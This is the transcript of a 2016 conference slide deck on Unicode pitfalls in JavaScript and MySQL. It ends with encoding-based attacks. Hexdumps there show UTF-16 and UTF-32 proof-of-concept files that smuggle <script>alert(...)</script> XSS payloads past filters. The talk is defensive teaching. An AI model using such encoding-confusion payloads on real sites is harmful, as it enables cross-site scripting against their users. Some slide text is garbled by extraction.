Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Unicode in 2016

Hacking with Unicode in 2016

This presentation explores common mistakes made by programmers when dealing with Unicode support and character encodings on the Web. For each mistake, I explain how to fix/prevent it, but also how it could possibly be exploited.

#ruhrsec

Video: https://www.youtube.com/watch?v=HhIEDWmQS3w

Mathias Bynens

April 29, 2016
Tweet

More Decks by Mathias Bynens

Other Decks in Technology

Transcript

 1. @mathias · #ruhrsec
  Hacking with Unicode

  View Slide

 2. @mathias

  View Slide

 3. 1. Unicode
  2. Encodings for Unicode
  3. Unicode in JavaScript
  4. Unicode in MySQL
  5. Hacking with Unicode
  What we’ll cover

  View Slide

 4. 1. Unicode

  View Slide

 5. code point unique name
  symbol/glyph

  View Slide

 6. A
  LATIN CAPITAL LETTER A
  U+0041

  View Slide

 7. a
  LATIN SMALL LETTER A
  U+0061

  View Slide

 8. ©
  COPYRIGHT SIGN
  U+00A9

  View Slide


 9. SNOWMAN
  U+2603

  View Slide

 10. PILE OF POO
  U+1F4A9
  !

  View Slide

 11. U+000000 → U+10FFFF

  View Slide

 12. (0x10FFFF + 1) code points

  17 planes
  (0xFFFF + 1) code points each

  View Slide

 13. Unicode plane #1
  U+0000 → U+FFFF
  Basic Multilingual Plane
  a.k.a. BMP

  View Slide

 14. Unicode planes #2-17
  U+010000 → U+10FFFF
  supplementary planes
  astral planes

  View Slide

 15. 2. Encodings

  View Slide

 16. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030
  U+000000 – U+00007F 1
  2
  4
  1
  1
  U+000080 – U+00009F
  2
  2 for characters
  inherited from
  GB 2312/GBK
  (e.g. most
  Chinese
  characters);
  4 for
  everything else
  U+0000A0 – U+0003FF 2
  U+000400 – U+0007FF
  3
  U+000800 – U+003FFF
  3
  U+004000 – U+00FFFF
  4
  U+010000 – U+03FFFF
  4 4 4
  U+040000 – U+10FFFF 5
  Number of bytes per code point

  View Slide

 17. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030
  U+000000 – U+00007F 1
  2
  4
  1
  1
  U+000080 – U+00009F
  2
  2 for characters
  inherited from
  GB 2312/GBK
  (e.g. most
  Chinese
  characters);
  4 for
  everything else
  U+0000A0 – U+0003FF 2
  U+000400 – U+0007FF
  3
  U+000800 – U+003FFF
  3
  U+004000 – U+00FFFF
  4
  U+010000 – U+03FFFF
  4 4 4
  U+040000 – U+10FFFF 5
  Number of bytes per code point

  View Slide

 18. 3. JavaScript " Unicode
  https://mths.be/jsu

  View Slide

 19. Hexadecimal escape sequences
  >> '\x41\x42\x43'
  'ABC'
  >> '\xA9 Caf\xE9 XYZ'
  '© Café XYZ'
  can be used for U+0000 → U+00FF

  View Slide

 20. Unicode escape sequences
  >> '\u0041\u0042\u0043'
  'ABC'
  >> 'I \u2661 JavaScript!'
  'I ὑ JavaScript!'
  can be used for U+0000 → U+FFFF

  View Slide

 21. …what about astral
  code points?

  View Slide

 22. …what about !?
  *…and other, equally important astral symbols
  *

  View Slide

 23. !

  View Slide

 24. Unicode code point escapes
  >> '\u{41}\u{42}\u{43}'
  'ABC'
  >> '\u{1F4A9}'
  '!' // U+1F4A9
  can be used for U+000000 → U+10FFFF
  ES6

  View Slide

 25. Surrogate pairs
  >> '\uD83D\uDCA9'
  '!' // U+1F4A9
  can be used for U+010000 → U+10FFFF

  View Slide

 26. Surrogate pairs
  // for astral code points (> 0xFFFF)
  function getSurrogates(codePoint) {
  var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800;
  var low = (codePoint - 0x10000) % 0x400 + 0xDC00;
  return [ high, low ];
  }
  function getCodePoint(high, low) {
  var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000;
  return codePoint;
  }
  >> getSurrogates(0x1F4A9); // U+1F4A9 is !
  [ 0xD83D, 0xDCA9 ]
  >> getCodePoint(0xD83D, 0xDCA9);
  0x1F4A9
  https://mths.be/bed

  View Slide

 27. JavaScript string length
  >> 'A'.length // U+0041
  1
  >> 'A' == '\u0041'
  true
  >> 'B'.length // U+0042
  1
  >> 'B' == '\u0042'
  true

  View Slide

 28. String length ≠ char count
  >> '!'.length // U+1D400
  2
  >> '!' == '\uD835\uDC00'
  true
  >> '"'.length // U+1D401
  2
  >> '"' == '\uD835\uDC01'
  true

  View Slide

 29. String length ≠ char count
  >> '!'.length // U+1F4A9
  2
  >> '!' == '\uD83D\uDCA9'
  true

  View Slide

 30. String length ≠ char count
  >> '!'.length // U+1F4A9
  2
  >> '!' == '\uD83D\uDCA9'
  true
  insert obligatory
  “number two” joke here

  View Slide

 31. Real-world example

  View Slide

 32. Real-world example

  View Slide

 33. View Slide

 34. View Slide

 35. String character count
  function countSymbols(string) {
  return punycode.ucs2.decode(string).length;
  }
  >> countSymbols('A') // U+0041
  1
  >> countSymbols('!') // U+1D400
  1
  >> countSymbols('!') // U+1F4A9
  1
  https://mths.be/punycode

  View Slide

 36. String character count
  function countSymbols(string) {
  return Array.from(string).length;
  }
  >> countSymbols('A') // U+0041
  1
  >> countSymbols('!') // U+1D400
  1
  >> countSymbols('!') // U+1F4A9
  1
  ES6

  View Slide

 37. String character count
  function countSymbols(string) {
  return [...string].length;
  }
  >> countSymbols('A') // U+0041
  1
  >> countSymbols('!') // U+1D400
  1
  >> countSymbols('!') // U+1F4A9
  1
  ES6

  View Slide

 38. JavaScript escape sequences
  http://mths.be/bmf

  View Slide

 39. If we’re being pedantic…
  // it’s actually even more complicated:
  >> 'mañana' == 'mañana'
  false

  View Slide

 40. If we’re being pedantic…
  // it’s actually even more complicated:
  >> 'mañana' == 'mañana'
  false
  >> 'ma\xF1ana' == 'man\u0303ana'
  false
  >> 'ma\xF1ana'.length
  6
  >> 'man\u0303ana'.length
  7

  View Slide

 41. function countSymbolsPedantically(string) {
  // Unicode Normalization, NFC form:
  var normalized = string.normalize('NFC');
  // Account for astral symbols / surrogates:
  return Array.from(normalized).length;
  }
  >> countSymbolsPedantically('mañana') // U+00F1
  6
  >> countSymbolsPedantically('mañana') // U+006E + U+0303
  6
  Unicode normalization
  http://git.io/unorm
  ES6

  View Slide

 42. Perfect?
  >> var zalgo = 'H
  ̹̙̦̮͉̩̗̗
  ͧ̇̏̊̾
  Eͨ͆͒̆ͮ̃
  ͏̷̮̣̫̤̣ ̵̞̹̻
  ̀̉̓ͬ͑͡
  ͅ
  Cͯ̂͐
  ͏̨̛͔̦̟͈̻
  O
  ̜͎͍͙͚̬̝̣
  ̽ͮ͐͗̀ͤ̍̀
  ͢
  M
  ̴̡̲̭͍͇̼̟̯̦
  ̉̒͠
  Ḛ̛̙̞̪̗
  ͥ
  ͤͩ̾͑̔͐
  ͅ
  Ṯ̴̷̷̗̼͍
  ̿̿̓̽͐
  H
  ̙̙
  ̔̄
  ͜
  ';

  View Slide

 43. Perfect? Nope.
  → can be ‘fixed’ using epic regex-fu
  >> var zalgo = 'H
  ̹̙̦̮͉̩̗̗
  ͧ̇̏̊̾
  Eͨ͆͒̆ͮ̃
  ͏̷̮̣̫̤̣ ̵̞̹̻
  ̀̉̓ͬ͑͡
  ͅ
  Cͯ̂͐
  ͏̨̛͔̦̟͈̻
  O
  ̜͎͍͙͚̬̝̣
  ̽ͮ͐͗̀ͤ̍̀
  ͢
  M
  ̴̡̲̭͍͇̼̟̯̦
  ̉̒͠
  Ḛ̛̙̞̪̗
  ͥ
  ͤͩ̾͑̔͐
  ͅ
  Ṯ̴̷̷̗̼͍
  ̿̿̓̽͐
  H
  ̙̙
  ̔̄
  ͜
  ';
  >> countSymbolsPedantically(zalgo)
  116 // not 9

  View Slide

 44. Reversing a string in JavaScript
  // naive solution
  function reverse(string) {
  return string.split('').reverse().join('');
  }

  View Slide

 45. Reversing a string in JavaScript
  // naive solution
  function reverse(string) {
  return string.split('').reverse().join('');
  }
  >> reverse('abc')
  'cba'

  View Slide

 46. Reversing a string in JavaScript
  // naive solution
  function reverse(string) {
  return string.split('').reverse().join('');
  }
  >> reverse('abc')
  'cba'
  >> reverse('mañana') // U+00F1
  'anañam'

  View Slide

 47. Reversing a string in JavaScript
  // naive solution
  function reverse(string) {
  return string.split('').reverse().join('');
  }
  >> reverse('abc')
  'cba'
  >> reverse('mañana') // U+00F1
  'anañam'
  >> reverse('mañana') // U+006E + U+0303
  'anãnam'

  View Slide

 48. Reversing a string in JavaScript
  // naive solution
  function reverse(string) {
  return string.split('').reverse().join('');
  }
  >> reverse('abc')
  'cba'
  >> reverse('mañana') // U+00F1
  'anañam'
  >> reverse('mañana') // U+006E + U+0303
  'anãnam'
  >> reverse('!') // U+1F4A9
  '��'
  '\uDCA9\uD83D' // the surrogate pair for !, in the wrong order

  View Slide

 49. “I put my thang down,
  flip it, and reverse it”
  — Missy ‘Misdemeanor’ Elliot, 2002

  View Slide

 50. Reversing a string in JavaScript
  // Using the Esrever library
  var reverse = esrever.reverse;
  >> reverse('abc')
  'cba'
  >> reverse('mañana') // U+00F1
  'anañam'
  >> reverse('mañana') // U+006E + U+0303
  'anañam'
  >> reverse('!') // U+1F4A9
  '!'
  https://mths.be/esrever

  View Slide

 51. Iterate over all symbols in a string
  function getSymbols(string) {
  var length = string.length;
  var index = -1;
  var output = [];
  var character;
  var charCode;
  while (++index < length) {
  character = string.charAt(index);
  charCode = character.charCodeAt(0);
  if (charCode >= 0xD800 && charCode <= 0xDBFF) {
  // note: this doesn’t account for lone high surrogates
  output.push(character + string.charAt(++index));
  } else {
  output.push(character);
  }
  }
  return output;
  }
  var symbols = getSymbols('! ');
  symbols.forEach(function(symbol) {
  assert(symbol == '! ');
  });

  View Slide

 52. Iterate over all symbols in a string
  for (const symbol of '!') {
  assert(symbol == '!');
  }
  ES6

  View Slide

 53. This behavior affects
  other string methods, too.

  View Slide

 54. More string madness
  •String#fromCharCode
  •String#charAt
  •String#substring
  •String#slice
  •…anything that involves strings
  •oh, and regular expressions

  View Slide

 55. JavaScript has a Unicode problem
  https://mths.be/jsu

  View Slide

 56. !
  The Pile of Poo Test™
  https://mths.be/jsu

  View Slide

 57. ! is the new %00

  View Slide

 58. 4. MySQL " Unicode

  View Slide

 59. CREATE TABLE `table_name` (
  `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
  `column_name` VARCHAR(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
  ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

  View Slide

 60. CREATE TABLE `table_name` (
  `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
  `column_name` VARCHAR(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
  ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

  View Slide

 61. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected, 1 warning (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 1
  mysql> SHOW WARNINGS;
  +---------+------+--------------------------------------------+
  | Level | Code | Message |
  +---------+------+--------------------------------------------+
  | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
  | | | for column 'column_name' at row 1 |
  +---------+------+--------------------------------------------+
  1 row in set (0.00 sec)
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo |
  +-------------+
  1 row in set (0.00 sec)

  View Slide

 62. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected, 1 warning (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 1
  mysql> SHOW WARNINGS;
  +---------+------+--------------------------------------------+
  | Level | Code | Message |
  +---------+------+--------------------------------------------+
  | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
  | | | for column 'column_name' at row 1 |
  +---------+------+--------------------------------------------+
  1 row in set (0.00 sec)
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo |
  +-------------+
  1 row in set (0.00 sec)

  View Slide

 63. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected, 1 warning (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 1
  mysql> SHOW WARNINGS;
  +---------+------+--------------------------------------------+
  | Level | Code | Message |
  +---------+------+--------------------------------------------+
  | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
  | | | for column 'column_name' at row 1 |
  +---------+------+--------------------------------------------+
  1 row in set (0.00 sec)
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo |
  +-------------+
  1 row in set (0.00 sec)

  View Slide

 64. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected, 1 warning (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 1
  mysql> SHOW WARNINGS;
  +---------+------+--------------------------------------------+
  | Level | Code | Message |
  +---------+------+--------------------------------------------+
  | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
  | | | for column 'column_name' at row 1 |
  +---------+------+--------------------------------------------+
  1 row in set (0.00 sec)
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo |
  +-------------+
  1 row in set (0.00 sec)

  View Slide

 65. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected, 1 warning (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 1
  mysql> SHOW WARNINGS;
  +---------+------+--------------------------------------------+
  | Level | Code | Message |
  +---------+------+--------------------------------------------+
  | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
  | | | for column 'column_name' at row 1 |
  +---------+------+--------------------------------------------+
  1 row in set (0.00 sec)
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo |
  +-------------+
  1 row in set (0.00 sec)

  View Slide

 66. MySQL’s ✌utf8✌

  View Slide

 67. ALTER TABLE `table_name`
  CONVERT TO CHARACTER SET utf8mb4
  COLLATE utf8mb4_unicode_ci;
  https://mths.be/utf8mb4

  View Slide

 68. ALTER TABLE `table_name`
  CONVERT TO CHARACTER SET utf8mb4
  COLLATE utf8mb4_unicode_ci;
  https://mths.be/utf8mb4

  View Slide

 69. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 0
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo!bar |
  +-------------+
  1 row in set (0.00 sec)
  https://mths.be/utf8mb4

  View Slide

 70. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
  Query OK, 1 row affected (0.00 sec)
  Rows matched: 1 Changed: 1 Warnings: 0
  mysql> SELECT column_name FROM table_name WHERE id = 9001;
  +-------------+
  | column_name |
  +-------------+
  | foo!bar |
  +-------------+
  1 row in set (0.00 sec)
  https://mths.be/utf8mb4

  View Slide

 71. 5. Hacking with Unicode

  View Slide

 72. http://mths.be/brk

  View Slide

 73. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
  000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
  000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
  000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
  000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
  00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
  00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
  00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
  00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
  00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
  00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
  00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
  00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
  00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
  000003e0

  View Slide

 74. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
  000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
  000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
  000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
  000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
  00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
  00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
  00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
  00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
  00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
  00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
  00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
  00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
  00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
  000003e0

  View Slide

 75. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
  000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
  000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
  000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
  000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
  00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
  00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
  00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
  00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
  00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
  00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
  00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
  00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
  00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
  000003e0

  View Slide

 76. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
  000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
  000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
  000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
  000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
  00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
  00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
  00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
  00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
  00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
  00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
  00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
  00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
  00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
  000003e0
  (U+3C73 CJK UNIFIED
  IDEOGRAPH-3C73)

  View Slide

 77. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
  000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
  000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
  000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
  000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
  00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
  00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
  00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
  00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
  00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
  00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
  00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
  00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
  00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
  000003e0
  (U+6372 CJK UNIFIED
  IDEOGRAPH-6372)

  View Slide

 78. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
  000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
  000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
  000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
  000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
  00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
  00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
  00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
  00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
  00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
  00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
  00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
  00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
  00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
  000003e0
  (U+6970 CJK UNIFIED
  IDEOGRAPH-6970)

  View Slide

 79. http://mths.be/brm

  View Slide

 80. http://mths.be/brm
  ∀scriptalert(1)/script

  View Slide

 81. $ hexdump -C utf-32-xss.html
  00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
  00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
  00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
  00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
  00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
  0000006c

  View Slide

 82. $ hexdump -C utf-32-xss.html
  00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
  00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
  00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
  00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
  00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
  0000006c

  View Slide

 83. $ hexdump -C utf-32-xss.html
  00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
  00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
  00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
  00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
  00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
